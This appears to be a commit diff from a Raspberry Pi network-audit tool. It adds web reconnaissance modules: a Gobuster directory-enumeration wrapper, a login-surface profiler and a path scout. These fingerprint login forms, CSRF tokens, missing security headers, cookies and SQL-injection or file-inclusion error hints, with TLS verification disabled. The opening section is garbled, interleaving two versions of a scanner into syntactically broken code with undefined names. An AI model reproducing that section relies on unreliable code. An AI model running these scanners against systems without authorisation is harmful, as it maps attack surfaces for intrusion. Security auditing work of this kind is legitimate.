paths = self.load_wordlist()
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.scan_path, paths)
self.save_results()
except Exception as e:
logging.error(f"Scan error: {e}")
finally:
self.session.close()
def save_settings(url, wordlist, output_dir, threads, delay):
"""Save settings to JSON file."""
def _first_hostname_from_row(row: Dict) -> str:
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"url": url,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
out = {}
for k, v in (headers or {}).items():
if not k:
continue
out[str(k).lower()] = str(v)
return out
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = _lower_headers(headers)
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
missing_headers = []
for header in [
"x-frame-options",
"x-content-type-options",
"content-security-policy",
"referrer-policy",
]:
if header not in h:
missing_headers.append(header)
# HSTS is only relevant on HTTPS.
if "strict-transport-security" not in h:
missing_headers.append("strict-transport-security")
rate_limited_hint = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
# Very cheap "issue hints"
issues = []
for s in SQLI_ERRORS:
if s in snippet:
issues.append("sqli_error_hint")
break
for s in LFI_HINTS:
if s in snippet:
issues.append("lfi_hint")
break
for s in DEBUG_HINTS:
if s in snippet:
issues.append("debug_hint")
break
cookie_names = []
if set_cookie:
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"missing_security_headers": missing_headers[:12],
"rate_limited_hint": bool(rate_limited_hint),
"issues": issues[:8],
"cookie_names": cookie_names[:12],
"server": h.get("server", ""),
"x_powered_by": h.get("x-powered-by", ""),
}
class ValkyrieScout:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _fetch(
self,
*,
ip: str,
port: int,
scheme: str,
path: str,
timeout_s: float,
user_agent: str,
max_bytes: int,
) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
headers_out: Dict[str, str] = {}
status = 0
size = 0
body_snip = ""
conn = None
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
def main():
parser = argparse.ArgumentParser(description="Web application vulnerability scanner")
parser.add_argument("-u", "--url", help="Target URL to scan")
parser.add_argument("-w", "--wordlist", help="Path to directory wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests")
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
chunk = resp.read(max_bytes)
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def _db_upsert(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
path: str,
status: int,
size: int,
response_ms: int,
content_type: str,
payload: dict,
user_agent: str,
):
try:
headers_json = json.dumps(payload, ensure_ascii=True)
except Exception:
headers_json = ""
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'valkyrie_scout', 'GET', ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
user_agent or "",
headers_json,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebScout/1.0"))
max_bytes = int(getattr(self.shared_data, "web_probe_max_bytes", 65536))
delay_s = float(getattr(self.shared_data, "valkyrie_delay_s", 0.05))
paths = getattr(self.shared_data, "valkyrie_scout_paths", None)
if not isinstance(paths, list) or not paths:
paths = DEFAULT_PATHS
# UI
self.shared_data.bjorn_orch_status = "ValkyrieScout"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
max_bytes=max_bytes,
)
# Only keep minimal info; do not store full HTML.
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
payload = {
"signals": signals,
"sample": {"status": int(status), "content_type": ctype, "rt_ms": int(elapsed_ms)},
}
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
payload=payload,
user_agent=user_agent,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"status": str(status),
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
if delay_s > 0:
time.sleep(delay_s)
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ValkyrieScout (light web scout)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="80")
args = parser.parse_args()
settings = load_settings()
url = args.url or settings.get("url")
wordlist = args.wordlist or settings.get("wordlist")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
delay = args.delay or settings.get("delay")
sd = SharedData()
act = ValkyrieScout(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": ""}
print(act.execute(args.ip, args.port, row, "ValkyrieScout"))
if not url:
logging.error("URL is required. Use -u or save it in settings")
return
save_settings(url, wordlist, output_dir, threads, delay)
scanner = ValkyieScout(
url=url,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
delay=delay
)
scanner.execute()
if __name__ == "__main__":
main()

View File

@@ -3,11 +3,11 @@
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table
- ON CONFLICT(mac_address, ip, port, directory) DO UPDATE
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit)
- No filesystem output: parse Gobuster stdout directly
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
- Updates bjorn_progress with actual percentage (0-100%).
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
- No filesystem output: parse Gobuster stdout/stderr directly.
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes.
"""
import re
@@ -15,6 +15,9 @@ import socket
import subprocess
import threading
import logging
import time
import os
import select
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
@@ -27,8 +30,8 @@ b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
@@ -36,8 +39,6 @@ b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
# Valeur de secours si l'UI n'a pas encore initialisé shared_data.web_status_codes
# (par défaut: 2xx utiles, 3xx, 401/403/405 et tous les 5xx; 429 non inclus)
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
@@ -50,7 +51,6 @@ CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
# /images (Status: 200) [Size: 12345]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
@@ -60,13 +60,14 @@ GOBUSTER_LINE = re.compile(
re.VERBOSE
)
# Regex pour capturer la progression de Gobuster sur stderr
# Ex: "Progress: 1024 / 4096 (25.00%)"
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
def _normalize_status_policy(policy) -> Set[int]:
"""
Transforme une politique "UI" en set d'entiers HTTP.
policy peut contenir:
- int (ex: 200, 403)
- "xXX" (ex: "2xx", "5xx")
- "a-b" (ex: "500-504")
"""
codes: Set[int] = set()
if not policy:
@@ -99,30 +100,48 @@ def _normalize_status_policy(policy) -> Set[int]:
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
In-memory only: no CSV, no temp files.
Streaming mode: Reads stdout/stderr in real-time for DB inserts and Progress UI.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
# Cache pour la taille de la wordlist (pour le calcul du %)
self.wordlist_size = 0
self._count_wordlist_lines()
# ---- Sanity checks
import os
self._available = True
if not os.path.exists(self.gobuster_path):
raise FileNotFoundError(f"Gobuster not found at {self.gobuster_path}")
logger.error(f"Gobuster not found at {self.gobuster_path}")
self._available = False
if not os.path.exists(self.wordlist):
raise FileNotFoundError(f"Wordlist not found: {self.wordlist}")
logger.error(f"Wordlist not found: {self.wordlist}")
self._available = False
# Politique venant de lUI : créer si absente
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
f"WebEnumeration initialized (stdout mode, no files). "
f"Using status policy: {self.shared_data.web_status_codes}"
f"WebEnumeration initialized (Streaming Mode). "
f"Wordlist lines: {self.wordlist_size}. "
f"Policy: {self.shared_data.web_status_codes}"
)
def _count_wordlist_lines(self):
"""Compte les lignes de la wordlist une seule fois pour calculer le %."""
if self.wordlist and os.path.exists(self.wordlist):
try:
# Lecture rapide bufferisée
with open(self.wordlist, 'rb') as f:
self.wordlist_size = sum(1 for _ in f)
except Exception as e:
logger.error(f"Error counting wordlist lines: {e}")
self.wordlist_size = 0
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
@@ -184,155 +203,195 @@ class WebEnumeration:
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
# -------------------- Gobuster runner (stdout) --------------------
def _run_gobuster_stdout(self, url: str) -> Optional[str]:
base_cmd = [
self.gobuster_path, "dir",
"-u", url,
"-w", self.wordlist,
"-t", "10",
"--quiet",
"--no-color",
# Si supporté par ta version gobuster, tu peux réduire le bruit dès la source :
# "-b", "404,429",
]
def run(cmd):
return subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# Try with -z first
cmd = base_cmd + ["-z"]
logger.info(f"Running Gobuster on {url}...")
try:
res = run(cmd)
if res.returncode == 0:
logger.success(f"Gobuster OK on {url}")
return res.stdout or ""
# Fallback if -z is unknown
if "unknown flag" in (res.stderr or "").lower() or "invalid" in (res.stderr or "").lower():
logger.info("Gobuster doesn't support -z, retrying without it.")
res2 = run(base_cmd)
if res2.returncode == 0:
logger.success(f"Gobuster OK on {url} (no -z)")
return res2.stdout or ""
logger.info(f"Gobuster failed on {url}: {res2.stderr.strip()}")
return None
logger.info(f"Gobuster failed on {url}: {res.stderr.strip()}")
return None
except Exception as e:
logger.error(f"Gobuster exception on {url}: {e}")
return None
def _parse_gobuster_text(self, text: str) -> List[Dict]:
"""
Parse gobuster stdout lines into entries:
{ 'path': '/admin', 'status': 301, 'size': 310, 'redirect': 'http://...'|None }
"""
entries: List[Dict] = []
if not text:
return entries
for raw in text.splitlines():
# 1) strip ANSI/control BEFORE regex
line = ANSI_RE.sub("", raw)
line = CTL_RE.sub("", line)
line = line.strip()
if not line:
continue
m = GOBUSTER_LINE.match(line)
if not m:
logger.debug(f"Unparsed line: {line}")
continue
# 2) extract all fields NOW
path = m.group("path") or ""
status = int(m.group("status"))
size = int(m.group("size") or 0)
redir = m.group("redir")
# 3) normalize path
if not path.startswith("/"):
path = "/" + path
path = "/" + path.strip("/")
entries.append({
"path": path,
"status": status,
"size": size,
"redirect": redir.strip() if redir else None
})
logger.info(f"Parsed {len(entries)} entries from gobuster stdout")
return entries
# -------------------- Public API --------------------
# -------------------- Public API (Streaming Version) --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
Run gobuster on (ip,port), parse stdout, upsert each finding into DB.
Run gobuster on (ip,port), STREAM stdout/stderr, upsert findings real-time.
Updates bjorn_progress with 0-100% completion.
Returns: 'success' | 'failed' | 'interrupted'
"""
if not self._available:
return 'failed'
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before start (orchestrator flag).")
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
logger.info(f"Enumerating {base_url} ...")
self.shared_data.bjornorch_status = "WebEnumeration"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before gobuster run.")
return "interrupted"
stdout_text = self._run_gobuster_stdout(base_url)
if stdout_text is None:
return "failed"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted after gobuster run (stdout captured).")
return "interrupted"
entries = self._parse_gobuster_text(stdout_text)
if not entries:
logger.warning(f"No entries for {base_url}.")
return "success" # scan ran fine but no findings
# ---- Filtrage dynamique basé sur shared_data.web_status_codes
allowed = self._allowed_status_set()
pre = len(entries)
entries = [e for e in entries if e["status"] in allowed]
post = len(entries)
if post < pre:
preview = sorted(list(allowed))[:10]
logger.info(
f"Filtered out {pre - post} entries not in policy "
f"{preview}{'...' if len(allowed) > 10 else ''}."
)
# Setup Initial UI
self.shared_data.comment_params = {"ip": ip, "port": str(port), "url": base_url}
self.shared_data.bjorn_orch_status = "WebEnumeration"
self.shared_data.bjorn_progress = "0%"
logger.info(f"Enumerating {base_url} (Stream Mode)...")
# Prepare Identity & Policy
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
allowed = self._allowed_status_set()
for e in entries:
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=e["path"],
status=e["status"],
size=e.get("size", 0),
response_time=0, # gobuster doesn't expose timing here
content_type=None, # unknown here; a later HEAD/GET probe can fill it
tool="gobuster"
# Command Construction
# NOTE: Removed "--quiet" and "-z" to ensure we get Progress info on stderr
# But we use --no-color to make parsing easier
cmd = [
self.gobuster_path, "dir",
"-u", base_url,
"-w", self.wordlist,
"-t", "10", # Safe for RPi Zero
"--no-color",
"--no-progress=false", # Force progress bar even if redirected
]
process = None
findings_count = 0
stop_requested = False
# For progress calc
total_lines = self.wordlist_size if self.wordlist_size > 0 else 1
last_progress_update = 0
try:
# Merge stdout and stderr so we can read everything in one loop
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
bufsize=1,
universal_newlines=True
)
return "success"
# Use select() (on Linux) so we can react quickly to stop requests
# without blocking forever on readline().
while True:
if self.shared_data.orchestrator_should_exit:
stop_requested = True
break
if process.poll() is not None:
# Process exited; drain remaining buffered output if any
line = process.stdout.readline() if process.stdout else ""
if not line:
break
else:
line = ""
if process.stdout:
if os.name != "nt":
r, _, _ = select.select([process.stdout], [], [], 0.2)
if r:
line = process.stdout.readline()
else:
# Windows: select() doesn't work on pipes; best-effort read.
line = process.stdout.readline()
if not line:
continue
# 3. Clean Line
clean_line = ANSI_RE.sub("", line).strip()
clean_line = CTL_RE.sub("", clean_line).strip()
if not clean_line:
continue
# 4. Check for Progress
if "Progress:" in clean_line:
now = time.time()
# Update UI max every 0.5s to save CPU
if now - last_progress_update > 0.5:
m_prog = GOBUSTER_PROGRESS_RE.search(clean_line)
if m_prog:
curr = int(m_prog.group("current"))
# Calculate %
pct = (curr / total_lines) * 100
pct = min(pct, 100.0)
self.shared_data.bjorn_progress = f"{int(pct)}%"
last_progress_update = now
continue
# 5. Check for Findings (Standard Gobuster Line)
m_res = GOBUSTER_LINE.match(clean_line)
if m_res:
st = int(m_res.group("status"))
# Apply Filtering Logic BEFORE DB
if st in allowed:
path = m_res.group("path")
if not path.startswith("/"): path = "/" + path
size = int(m_res.group("size") or 0)
redir = m_res.group("redir")
# Insert into DB Immediately
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=path,
status=st,
size=size,
response_time=0,
content_type=None,
tool="gobuster"
)
findings_count += 1
# Live feedback in comments
self.shared_data.comment_params = {
"url": base_url,
"found": str(findings_count),
"last": path
}
continue
# (Optional) Log errors/unknown lines if needed
# if "error" in clean_line.lower(): logger.debug(f"Gobuster err: {clean_line}")
# End of loop
if stop_requested:
logger.info("Interrupted by orchestrator.")
return "interrupted"
self.shared_data.bjorn_progress = "100%"
return "success"
except Exception as e:
logger.error(f"Execute error on {base_url}: {e}")
if process:
try:
process.terminate()
except Exception:
pass
return "failed"
finally:
if process:
try:
if stop_requested and process.poll() is None:
process.terminate()
# Always reap the child to avoid zombies.
try:
process.wait(timeout=2)
except Exception:
try:
process.kill()
except Exception:
pass
try:
process.wait(timeout=2)
except Exception:
pass
finally:
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
except Exception as e:
logger.error(f"Execute error on {ip}:{port}: {e}")
logger.error(f"General execution error: {e}")
return "failed"
@@ -341,7 +400,7 @@ if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration...")
logger.info("Starting web directory enumeration (CLI)...")
rows = shared_data.read_data()
for row in rows:
@@ -351,6 +410,7 @@ if __name__ == "__main__":
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":

View File

@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_login_profiler.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebLoginProfiler"
b_module = "web_login_profiler"
b_status = "WebLoginProfiler"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 55
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
"/",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
"/robots.txt",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
# Very cheap login form heuristics
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
# Rate limit / lockout hints
rate_limited = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
cookie_names = []
if set_cookie:
# Parse only cookie names cheaply
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
framework_hints = []
for cn in cookie_names:
l = cn.lower()
if l in {"csrftoken", "sessionid"}:
framework_hints.append("django")
elif l in {"laravel_session", "xsrf-token"}:
framework_hints.append("laravel")
elif l == "phpsessid":
framework_hints.append("php")
elif "wordpress" in l:
framework_hints.append("wordpress")
server = h.get("server", "")
powered = h.get("x-powered-by", "")
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"rate_limited_hint": bool(rate_limited),
"server": server,
"x_powered_by": powered,
"cookie_names": cookie_names[:12],
"framework_hints": sorted(set(framework_hints))[:6],
}
class WebLoginProfiler:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _db_upsert(self, *, mac: str, ip: str, hostname: str, port: int, path: str,
status: int, size: int, response_ms: int, content_type: str,
method: str, user_agent: str, headers_json: str):
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'login_profiler', ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
method or "GET",
user_agent or "",
headers_json or "",
),
)
def _fetch(self, *, ip: str, port: int, scheme: str, path: str, timeout_s: float,
user_agent: str) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
body_snip = ""
headers_out: Dict[str, str] = {}
status = 0
size = 0
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
# Read only a small chunk (Pi-friendly) for fingerprinting.
chunk = resp.read(65536) # 64KB
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebProfiler/1.0"))
paths = getattr(self.shared_data, "web_login_profiler_paths", None) or DEFAULT_PATHS
if not isinstance(paths, list):
paths = DEFAULT_PATHS
self.shared_data.bjorn_orch_status = "WebLoginProfiler"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
found_login = 0
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
)
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
if signals.get("looks_like_login") or signals.get("auth_type"):
found_login += 1
headers_payload = {
"signals": signals,
"sample": {
"status": status,
"content_type": ctype,
},
}
try:
headers_json = json.dumps(headers_payload, ensure_ascii=True)
except Exception:
headers_json = ""
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
method="GET",
user_agent=user_agent,
headers_json=headers_json,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
progress.set_complete()
# "success" means: profiler ran; not that a login exists.
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

View File

@@ -0,0 +1,233 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import time
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_surface_mapper.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebSurfaceMapper"
b_module = "web_surface_mapper"
b_status = "WebSurfaceMapper"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_success:WebLoginProfiler"
b_priority = 45
b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
def _scheme_for_port(port: int) -> str:
